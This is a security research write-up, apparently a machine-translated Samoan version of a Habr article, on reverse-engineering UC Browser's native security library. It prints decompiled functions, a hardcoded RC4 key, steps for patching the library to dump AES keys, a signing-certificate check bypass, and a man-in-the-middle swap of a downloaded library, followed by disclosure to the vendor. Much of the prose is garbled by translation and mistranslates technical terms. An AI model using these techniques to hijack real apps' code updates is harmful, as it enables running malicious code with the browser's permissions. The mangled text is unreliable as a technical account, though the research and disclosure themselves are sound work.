Ua matou aʻoaʻoina le faʻaogaina o le faʻaogaina o le numera o masini i totonu o le faletusi libsgmainso-6.4.36.so mai le UC Browser ma maua le code function JNI_OnLoad.
int __fastcall real_JNI_OnLoad(JavaVM *vm)
{
int result; // r0
jclass clazz; // r0 MAPDST
int v4; // r0
JNIEnv *env; // r4
int v6; // [sp-40h] [bp-5Ch]
int v7; // [sp+Ch] [bp-10h]
v7 = *(_DWORD *)off_8AC00;
if ( !vm )
goto LABEL_39;
sub_7C4F4();
env = (JNIEnv *)sub_7C5B0(0);
if ( !env )
goto LABEL_39;
v4 = sub_72CCC();
sub_73634(v4);
sub_73E24(&unk_83EA6, &v6, 49);
clazz = (jclass)((int (__fastcall *)(JNIEnv *, int *))(*env)->FindClass)(env, &v6);
if ( clazz
&& (sub_9EE4(),
sub_71D68(env),
sub_E7DC(env) >= 0
&& sub_69D68(env) >= 0
&& sub_197B4(env, clazz) >= 0
&& sub_E240(env, clazz) >= 0
&& sub_B8B0(env, clazz) >= 0
&& sub_5F0F4(env, clazz) >= 0
&& sub_70640(env, clazz) >= 0
&& sub_11F3C(env) >= 0
&& sub_21C3C(env, clazz) >= 0
&& sub_2148C(env, clazz) >= 0
&& sub_210E0(env, clazz) >= 0
&& sub_41B58(env, clazz) >= 0
&& sub_27920(env, clazz) >= 0
&& sub_293E8(env, clazz) >= 0
&& sub_208F4(env, clazz) >= 0) )
{
result = (sub_B7B0(env, clazz) >> 31) | 0x10004;
}
else
{
LABEL_39:
result = -1;
}
return result;
}Sei o tatou tilotilo totoa i laina nei:
sub_73E24(&unk_83EA6, &v6, 49);
clazz = (jclass)((int (__fastcall *)(JNIEnv *, int *))(*env)->FindClass)(env, &v6);I galuega faatino sub_73E24 o le igoa o le vasega o lo'o manino lava le fa'amama. I le avea ai ma tapulaʻa i lenei galuega, o se faʻasino i faʻamatalaga e tutusa ma faʻamatalaga faʻailoga, o se paʻu ma se numera e pasia. E manino lava, a maeʻa ona valaʻau i le galuega, o le ai ai se laina decrypted i totonu o le pa, talu ai e pasi atu i le galuega. FindClass, lea e ave le igoa o le vasega o le parakalafa lona lua. O le mea lea, o le numera o le tele o le paʻu poʻo le umi o le laina. Sei o tatou taumafai e faauigaina le igoa o le vasega, e tatau ona ta'u mai ai pe o tatou agai i le itu sa'o. Sei o tatou va'ava'ai toto'a i le mea e tupu i totonu sub_73E24.
int __fastcall sub_73E56(unsigned __int8 *in, unsigned __int8 *out, size_t size)
{
int v4; // r6
int v7; // r11
int v8; // r9
int v9; // r4
size_t v10; // r5
int v11; // r0
struc_1 v13; // [sp+0h] [bp-30h]
int v14; // [sp+1Ch] [bp-14h]
int v15; // [sp+20h] [bp-10h]
v4 = 0;
v15 = *(_DWORD *)off_8AC00;
v14 = 0;
v7 = sub_7AF78(17);
v8 = sub_7AF78(size);
if ( !v7 )
{
v9 = 0;
goto LABEL_12;
}
(*(void (__fastcall **)(int, const char *, int))(v7 + 12))(v7, "DcO/lcK+h?m3c*q@", 16);
if ( !v8 )
{
LABEL_9:
v4 = 0;
goto LABEL_10;
}
v4 = 0;
if ( !in )
{
LABEL_10:
v9 = 0;
goto LABEL_11;
}
v9 = 0;
if ( out )
{
memset(out, 0, size);
v10 = size - 1;
(*(void (__fastcall **)(int, unsigned __int8 *, size_t))(v8 + 12))(v8, in, v10);
memset(&v13, 0, 0x14u);
v13.field_4 = 3;
v13.field_10 = v7;
v13.field_14 = v8;
v11 = sub_6115C(&v13, &v14);
v9 = v11;
if ( v11 )
{
if ( *(_DWORD *)(v11 + 4) == v10 )
{
qmemcpy(out, *(const void **)v11, v10);
v4 = *(_DWORD *)(v9 + 4);
}
else
{
v4 = 0;
}
goto LABEL_11;
}
goto LABEL_9;
}
LABEL_11:
sub_7B148(v7);
LABEL_12:
if ( v8 )
sub_7B148(v8);
if ( v9 )
sub_7B148(v9);
return v4;
}galuega tauave lalo_7AF78 fa'atupuina se fa'ata'ita'iga o se atigipusa mo fa'asologa o byte o le lapo'a fa'apitoa (matou te le'o fa'amatala auiliili i luga o nei koneteina). O iinei e lua koneteina e faia ai: o le tasi e iai le laina "DcO/lcK+h?m3c*q@" (e faigofie ona mateina o se ki lea), o le isi o loʻo i ai faʻamatalaga faʻailoga. O le isi, o mea uma e lua e tuʻuina i totonu o se fausaga faʻapitoa, lea e pasi atu i le galuega lalo_6115C. Sei o tatou faailoga foi se fanua ma le tau 3 i lenei fausaga. Sei o tatou vaai po o le a le mea e tupu i lenei fausaga e sosoo ai.
int __fastcall sub_611B4(struc_1 *a1, _DWORD *a2)
{
int v3; // lr
unsigned int v4; // r1
int v5; // r0
int v6; // r1
int result; // r0
int v8; // r0
*a2 = 820000;
if ( a1 )
{
v3 = a1->field_14;
if ( v3 )
{
v4 = a1->field_4;
if ( v4 < 0x19 )
{
switch ( v4 )
{
case 0u:
v8 = sub_6419C(a1->field_0, a1->field_10, v3);
goto LABEL_17;
case 3u:
v8 = sub_6364C(a1->field_0, a1->field_10, v3);
goto LABEL_17;
case 0x10u:
case 0x11u:
case 0x12u:
v8 = sub_612F4(
a1->field_0,
v4,
*(_QWORD *)&a1->field_8,
*(_QWORD *)&a1->field_8 >> 32,
a1->field_10,
v3,
a2);
goto LABEL_17;
case 0x14u:
v8 = sub_63A28(a1->field_0, v3);
goto LABEL_17;
case 0x15u:
sub_61A60(a1->field_0, v3, a2);
return result;
case 0x16u:
v8 = sub_62440(a1->field_14);
goto LABEL_17;
case 0x17u:
v8 = sub_6226C(a1->field_10, v3);
goto LABEL_17;
case 0x18u:
v8 = sub_63530(a1->field_14);
LABEL_17:
v6 = 0;
if ( v8 )
{
*a2 = 0;
v6 = v8;
}
return v6;
default:
LOWORD(v5) = 28032;
goto LABEL_5;
}
}
}
}
LOWORD(v5) = -27504;
LABEL_5:
HIWORD(v5) = 13;
v6 = 0;
*a2 = v5;
return v6;
}O le fa'asologa o suiga o se fausaga fausaga na tu'uina muamua i le tau 3. Va'ai i le mataupu 3: i le galuega. lalo_6364C e pasia mai le fausaga na faʻaopoopoina iina i le galuega muamua, o lona uiga o le ki ma faʻamatalaga faʻailoga. Afai e te tilotilo totoa i lalo_6364C, e mafai ona e iloa le RC4 algorithm i totonu.
E iai a matou algorithm ma se ki. Sei o tatou taumafai e faauigaina le igoa o le vasega. O le mea lenei na tupu: com/taobao/uaealesi/security/adapter/JNICLibrary. Matagofie! Ua tatou i ai i le ala sa'o.
Laau o poloaiga
O lea la e tatau ona tatou sailia se luitau RegisterNatives, lea o le a faasino i tatou i le galuega doCommandNative. Sei o tatou vaavaai i galuega tauave ua valaauina mai JNI_OnLoad, ma tatou maua i totonu sub_B7B0:
int __fastcall sub_B7F6(JNIEnv *env, jclass clazz)
{
char signature[41]; // [sp+7h] [bp-55h]
char name[16]; // [sp+30h] [bp-2Ch]
JNINativeMethod method; // [sp+40h] [bp-1Ch]
int v8; // [sp+4Ch] [bp-10h]
v8 = *(_DWORD *)off_8AC00;
decryptString((unsigned __int8 *)&unk_83ED9, (unsigned __int8 *)name, 0x10u);// doCommandNative
decryptString((unsigned __int8 *)&unk_83EEA, (unsigned __int8 *)signature, 0x29u);// (I[Ljava/lang/Object;)Ljava/lang/Object;
method.name = name;
method.signature = signature;
method.fnPtr = sub_B69C;
return ((int (__fastcall *)(JNIEnv *, jclass, JNINativeMethod *, int))(*env)->RegisterNatives)(env, clazz, &method, 1) >> 31;
}Ma e moni lava, o se auala masani ma le igoa ua resitalaina iinei doCommandNative. O lea ua tatou iloa lona tuatusi. Sei o tatou vaai po o le a lana mea e fai.
int __fastcall doCommandNative(JNIEnv *env, jobject obj, int command, jarray args)
{
int v5; // r5
struc_2 *a5; // r6
int v9; // r1
int v11; // [sp+Ch] [bp-14h]
int v12; // [sp+10h] [bp-10h]
v5 = 0;
v12 = *(_DWORD *)off_8AC00;
v11 = 0;
a5 = (struc_2 *)malloc(0x14u);
if ( a5 )
{
a5->field_0 = 0;
a5->field_4 = 0;
a5->field_8 = 0;
a5->field_C = 0;
v9 = command % 10000 / 100;
a5->field_0 = command / 10000;
a5->field_4 = v9;
a5->field_8 = command % 100;
a5->field_C = env;
a5->field_10 = args;
v5 = sub_9D60(command / 10000, v9, command % 100, 1, (int)a5, &v11);
}
free(a5);
if ( !v5 && v11 )
sub_7CF34(env, v11, &byte_83ED7);
return v5;
}I le igoa e mafai ona e mateina o le mea lea e ulufale ai i galuega uma na filifili le au atinaʻe e faʻafeiloaʻi i le faletusi. Matou te fiafia i galuega numera 10601.
E mafai ona e vaʻai mai le code o le numera o le poloaiga e maua ai numera e tolu: poloaiga/10000, poloaiga % 10000 / 100 и poloaiga % 10, o lona uiga, i la tatou tulaga, 1, 6 ma le 1. O numera nei e tolu, faʻapea foʻi ma se faʻasino i le JNIEnv ma o finauga na pasia i le galuega e faaopoopo i se fausaga ma pasi atu. I le fa'aaogaina o numera e tolu na maua (se'i ta'u le N1, N2 ma le N3), e fausia ai se laau fa'atonu.
O se mea faapenei:
O le la'au ua fa'atumuina ma le malosi JNI_OnLoad.
E tolu numera faʻapipiʻi le ala i totonu o le laʻau. O laulaau ta'itasi o le la'au o lo'o i ai le tuatusi fa'apipi'i o le galuega fa'atatau. O le ki o lo'o i totonu o le node matua. O le suʻeina o le nofoaga i le code lea e faʻaopoopoina ai le galuega matou te manaʻomia i le laʻau e le faigata pe afai e te malamalama i fausaga uma na faʻaaogaina (matou te le faʻamatalaina ina ia aua neʻi faʻafefeina se tala tele).
Sili atu fa'alavelave
Na matou mauaina le tuatusi o le galuega e tatau ona faʻamalo felauaiga: 0x5F1AC. Ae ua vave tele ona fiafia: ua saunia e le au atiaʻe o le UC Browser se isi mea e ofo ai mo i matou.
A maeʻa ona maua faʻamaufaʻailoga mai le laina na faia i le Java code, matou te maua
i le galuega ile tuatusi 0x4D070. Ma o lo'o fa'atali mai se isi ituaiga o fa'alilolilo fa'ailoga.
Matou te tuʻuina faʻailoga se lua i le R7 ma le R4:
Matou te suia le faʻailoga muamua i le R11:
Ina ia maua se tuatusi mai se laulau, faʻaaoga se faʻasino:
A maeʻa ona alu i le tuatusi muamua, o loʻo faʻaaogaina le faasino igoa lona lua, lea o loʻo i totonu o le R4. E 230 elemene i le laulau.
O le a le mea e fai i ai? E mafai ona e taʻu atu i le IDA o le ki lea: Faʻasaʻo -> Isi -> Faʻamaonia le gagana sui.
E mata'utia le fua o le code. Ae, o lou ala atu i lona togavao, e mafai ona e matauina se valaau i se galuega ua masani ia i matou lalo_6115C:
Sa i ai se ki lea i le tulaga 3 sa i ai se decryption e faʻaaoga ai le RC4 algorithm. Ma i lenei tulaga, o le fausaga na pasia i le galuega e faʻatumu mai faʻamaufaʻailoga na pasia i doCommandNative. Sei o tatou manatua mea na tatou maua iina magicInt ma le tau 16. Matou te vaʻavaʻai i le mataupu tutusa - ma a maeʻa ni suiga matou te maua ai le code lea e mafai ai ona iloa le algorithm.
Ole AES lea!
O loʻo i ai le algorithm, pau lava le mea o loʻo totoe o le mauaina lea o ona faʻamaufaʻailoga: mode, ki ma, atonu, o le amataga o le vector (o lona i ai e faʻalagolago i le faʻaogaina o le AES algorithm). O le fausaga faʻatasi ma i latou e tatau ona fausia i se mea aʻo leʻi faia le galuega lalo_6115C, ae o lenei vaega o le code e sili ona faʻafefeteina, o lea e tulaʻi mai ai le manatu e faʻapipiʻi le code ina ia tuʻuina uma vaega o le decryption galuega i totonu o se faila.
Fono
Ina ia aua neʻi tusia uma le patch code i le gagana faʻapotopotoga ma le lima, e mafai ona e faʻalauiloa le Android Studio, tusi se galuega iina e maua ai tutusa faʻamaufaʻailoga e pei o le matou decryption galuega ma tusi i se faila, ona kopi-faʻapipiʻi le code o le a faia e le tagata faʻapipiʻi. fa'atupu.
O a matou uo mai le UC Browser team na latou tausia foi le faigofie o le faʻaopoopoina o le code. Ia tatou manatua o le amataga o galuega taitasi o loʻo i ai a tatou tulafono lapisi e faigofie ona suia i soʻo se isi. Faʻafaigofie tele 🙂 Ae ui i lea, i le amataga o le galuega faʻamoemoe e le lava le avanoa mo le code e faʻasaoina uma faʻamau i se faila. Sa tatau ona ou vaevae i ni vaega ma faaaoga poloka lapisi mai galuega tuaoi. E fa vaega atoa.
Vaega muamua:
I le fausaga o le ARM, o le fa'asologa o galuega muamua e fa e pasi atu i tusi resitala R0-R3, o isi, pe a iai, e pasia i le faaputuga. O le tusi resitala LR o loʻo i ai le tuatusi toe faafoi. O nei mea uma e manaʻomia ona faʻasaoina ina ia mafai ona galue le galuega pe a uma ona matou lafoaʻia ona faʻamau. Matou te manaʻomia foʻi ona faʻasaoina uma tusi resitala o le a matou faʻaogaina i le faagasologa, o lea matou te faia PUSH.W {R0-R10,LR}. I le R7 matou te maua ai le tuatusi o le lisi o taʻiala na pasia i le galuega e ala i le faaputuga.
Fa'aaogaina o le galuega fopen tatou tatala le faila /data/local/tmp/aes i le "ab" mode
o lona uiga mo se fa'aopoopoga. I le R0 matou te utaina le tuatusi o le igoa faila, i le R1 - le tuatusi o le laina e faʻaalia ai le faiga. Ma o iinei e muta ai le lapisi code, o lea matou te agai atu i le isi galuega. Ina ia faʻaauau pea ona galue, matou te tuʻuina i le amataga le suiga i le code moni o le galuega, faʻafefe le lapisi, ma nai lo le lapisi matou te faʻaopoopoina se faʻaauau o le patch.
Valaauga fopen.
O vaega muamua e tolu o le galuega aes iai ituaiga int. Talu ai na matou faʻasaoina tusi resitala i le faaputuga i le amataga, e mafai ona matou pasia le galuega tusi o latou tuatusi i luga o le faaputuga.
E sosoo ai e tolu a matou fausaga o loʻo i ai le tele o faʻamaumauga ma se faʻasino i faʻamaumauga mo le ki, faʻasologa o le vector ma faʻailoga faʻailoga.
I le faaiuga, tapuni le faila, toe faʻafoʻi tusi resitala ma faʻafeiloaʻi le pule i le galuega moni aes.
Matou te aoina se APK faʻatasi ma se faletusi faʻapipiʻi, saini, faʻapipiʻi i le masini / emulator, ma faʻalauiloa. Matou te vaʻai o loʻo faia le matou faʻamalo, ma le tele o faʻamaumauga o loʻo tusia iina. E fa'aogaina e le su'esu'e fa'amatalaga e le gata mo fefa'atauaiga, ma o fa'amatalaga uma e alu i le galuega o lo'o fesiligia. Ae mo nisi mafuaʻaga e le o iai iina le faʻamatalaga talafeagai, ma o le talosaga manaʻomia e le o vaʻaia i le auala. Ina ia aua neʻi faʻatali seʻia oʻo ina faia e le UC Browser le talosaga talafeagai, seʻi o tatou ave le tali faʻailoga mai le 'auʻaunaga na maua muamua ma toe faʻapipiʻi le talosaga: faʻaopoopo le decryption i le onCreate o le gaioiga autu.
const/16 v1, 0x62
new-array v1, v1, [B
fill-array-data v1, :encrypted_data
const/16 v0, 0x1f
invoke-static {v0, v1}, Lcom/uc/browser/core/d/c/g;->j(I[B)[B
move-result-object v1
array-length v2, v1
invoke-static {v2}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
move-result-object v2
const-string v0, "ololo"
invoke-static {v0, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)IMatou te faʻapotopoto, sainia, faʻapipiʻi, faʻalauiloa. Matou te mauaina se NullPointerException ona o le auala na toe faʻafoʻi le null.
I le taimi o suʻesuʻega atili o le code, na maua ai se galuega e faʻamatalaina ai laina manaia: "META-INF/" ma le ".RSA". E foliga mai o loʻo faʻamaonia e le talosaga lana tusi faamaonia. Po'o le fa'atupuina o ki mai ai. Ou te le manaʻo tele e taulimaina le mea o loʻo tupu i le tusi faamaonia, o lea o le a matou seʻe i ai le tusi faamaonia saʻo. Seʻi o tatou faʻapipiʻi le laina faʻailoga ina ia le o le "META-INF/" tatou te maua le "BLABLINF/", fai se faila ma lena igoa i le APK ma faʻaopopo le tusi faʻamaonia squirrel browser iina.
Matou te faʻapotopoto, sainia, faʻapipiʻi, faʻalauiloa. Bingo! Ua ia i tatou le ki!
MitM
Na matou maua se ki ma se vector initialization tutusa ma le ki. Sei o tatou taumafai e faʻamalo le tali a le server i le CBC mode.
Matou te vaʻai i le archive URL, se mea e tutusa ma le MD5, "extract_unzipsize" ma se numera. Matou te siakiina: o le MD5 o le archive e tutusa, o le tele o le faletusi e leʻi faʻapipiʻiina e tutusa. O loʻo matou taumafai e faʻapipiʻi lenei faletusi ma tuʻuina atu i le browser. Ina ia faʻaalia ua utaina le matou faletusi faʻapipiʻi, o le a matou faʻalauiloaina se Faʻamoemoe e fai se SMS ma le tusitusiga "PWNED!" O le a matou suia tali e lua mai le server: ma ia sii maia le archive. I le muamua matou te sui MD5 (e le suia le tele pe a uma ona tatala), i le lona lua matou te tuʻuina atu le faʻamaumauga ma le faletusi faʻapipiʻi.
E taumafai le browser e sii mai le archive i le tele o taimi, a maeʻa ona tuʻuina mai ai se mea sese. E foliga mai o se mea
e le fiafia o ia. O le iʻuga o le suʻesuʻeina o lenei faʻailoga mataga, na faʻaalia ai e faʻasalalau foi e le server le tele o le archive:
O lo'o fa'ailoga i le LEB128. Ina ua maeʻa le patch, o le tele o le archive ma le faletusi na suia teisi, o lea na manatu ai le suʻesuʻega o le archive na faʻafefeteina na sii mai, ma ina ua mavae ni nai taumafaiga na lafo ai se mea sese.
Matou te fetuunai le tele o le archive ... Ma - manumalo! 🙂 O le taunuuga o loʻo i totonu o le vitio.
Taunuʻuga ma tali a le au atinaʻe
I le auala lava e tasi, e mafai e tagata taʻavale ona faʻaogaina le le saogalemu o le UC Browser e tufatufa ma faʻatautaia faletusi leaga. O nei faletusi o le a galulue i le tulaga o le browser, o lea o le a latou mauaina uma ana faʻatagaga. O le iʻuga, o le mafai ona faʻaalia phishing windows, faʻapea foʻi ma le avanoa i faila galue o le squirrel Saina moli, e aofia ai logins, passwords ma kuki o loʻo teuina i totonu o faʻamaumauga.
Na matou faʻafesoʻotaʻi le au atiaʻe o le UC Browser ma logoina i latou e uiga i le faʻafitauli na matou mauaina, taumafai e faʻasino le faʻafitauli ma lona lamatiaga, ae latou te leʻi talanoaina se mea ma i matou. I le taimi nei, na faʻaauau pea ona faʻaalia e le browser lona tulaga mataʻutia i le vaʻaia. Ae o le taimi lava na matou faʻaalia ai faʻamatalaga o le faʻafitauli, ua le toe mafai ona le amanaiaina e pei ona muamua. Mati 27 na
na tatalaina se lomiga fou o le UC Browser 12.10.9.1193, lea na maua ai le server e ala i le HTTPS: .
E le gata i lea, i le maeʻa ai o le "fix" ma seʻia oʻo i le taimi na tusia ai lenei tusiga, o le taumafai e tatala se PDF i totonu o se masini suʻesuʻe na iʻu ai i se faʻamatalaga sese ma le tusitusiga "Oi, ua i ai se mea na tupu!" E leʻi faia se talosaga i le 'auʻaunaga pe a taumafai e tatala se PDF, ae na faia se talosaga ina ua faʻalauiloa le browser, lea e faʻaalia ai le faʻaauau pea ona mafai ona sii mai le tulafono faʻatinoina e solia ai tulafono a Google Play.
puna: www.habr.com